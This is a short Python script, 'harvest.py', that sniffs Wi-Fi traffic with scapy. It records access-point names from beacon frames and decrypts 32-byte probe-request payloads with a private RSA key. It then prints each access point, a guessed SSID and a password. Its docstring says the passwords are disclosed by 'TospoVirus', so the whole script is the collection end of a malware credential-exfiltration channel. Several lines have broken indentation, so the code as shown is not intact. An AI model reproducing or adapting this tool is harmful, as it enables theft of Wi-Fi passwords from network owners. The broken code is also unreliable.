harvest.py

1. __author__ = 'catatonic'
2. """
3. harvest.py:
4.    Identifies potential candidate packets for TospoVirus disclosed passwords.
5. """
6.  
7. from scapy.all import *
8. import urllib
9. from subprocess import Popen
10. import difflib
11.  
12. ap_list = {}
13. def monitor(pkt):
14.     if pkt.haslayer(Dot11) and pkt.type == 0 and pkt.subtype == 8:
15.         if pkt.addr2 not in ap_list and len(pkt.info) > 0:
16.             ap_list[pkt.addr2] = pkt.info
17.             print "adding: %s %s" %(pkt.addr2, pkt.info)
18.     if pkt.haslayer(Dot11) and pkt.type == 0 and pkt.subtype == 4 and len(pkt.info) == 32:
19.     dec = Popen(['openssl', 'rsautl', '-decrypt', '-inkey', 'tvd.pem'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
20.     dec.stdin.write(pkt.info)
21.     dec.stdin.close()
22.     dec.wait()
23.         rc = dec.returncode
24.         if rc == 0:
25.             for close_match in difflib.get_close_matches(pkt.addr2, ap_list):
26.                 print "AP: %s\t\tGuessed SSID: %s\t\tPass: %s" %(pkt.addr2, ap_list[close_match], dec.stdout.readline())
27.  
28. if len(sys.argv) < 2:
29.    print "Usage: sudo python harvest.py [monitor-iface]"
30.    exit()
31. conf.iface = sys.argv[1]
32. print '[*] Monitoring on %s' %(sys.argv[1])
33. sniff(prn=monitor, store=0)